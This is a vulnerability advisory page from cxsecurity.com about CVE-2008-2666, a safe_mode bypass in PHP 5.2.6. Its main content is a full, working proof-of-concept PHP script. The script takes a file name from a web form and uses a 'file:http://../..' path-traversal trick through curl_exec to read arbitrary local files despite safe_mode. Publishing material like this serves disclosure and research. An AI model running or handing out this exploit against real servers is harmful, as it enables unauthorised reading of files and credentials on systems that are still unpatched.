PHP 5.2.6 safe_mode bypass PoC

2008-06-28 / 2008-06-29
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

<?php /* Exploit for CVE-2008-2666: http://cxsecurity.com/research//55 Orginal URL http://cxsecurity.com/achievement_exploitalert/10 safe_mode Bypass PHP 5.2.6 by Maksymilian Arciemowicz http://cxsecurity.com cxib [at] cxsecurity [dot] com How to fix? Do not use safe_mode as a main safety */ eCHo "<PRE><P>This is exploit from <a href=\"http://cxsecurity.com\">http://cxsecurity.com</a> Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode bypass<p>More: <a href=\"http://cxsecurity.com/news/0/0x24\">http://cxsecurity.com/news/0/0x24</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"></form>\n"; if(!IS_dir(dirname(__FILE__)."/http:")){ // can work without this requirement if(!IS_writable(dirname(__FILE__))) die("<b>I can't create http: directory</b>"); mkDIR("http:"); } if(Empty($file) aNd Empty($_GET['file']) aNd Empty($_POST['file'])) diE("\n".$karatonik); if(!empty($_GET['file'])) $file=$_GET['file']; if(!empty($_POST['file'])) $file=$_POST['file']; if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd !emptY($file)) die("<B><br>best regards cxib from cxsecurity.com</B></FONT>"); elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File <B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>"); ?>

References:

http://cxsecurity.com/issue/WLB-2008060054


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top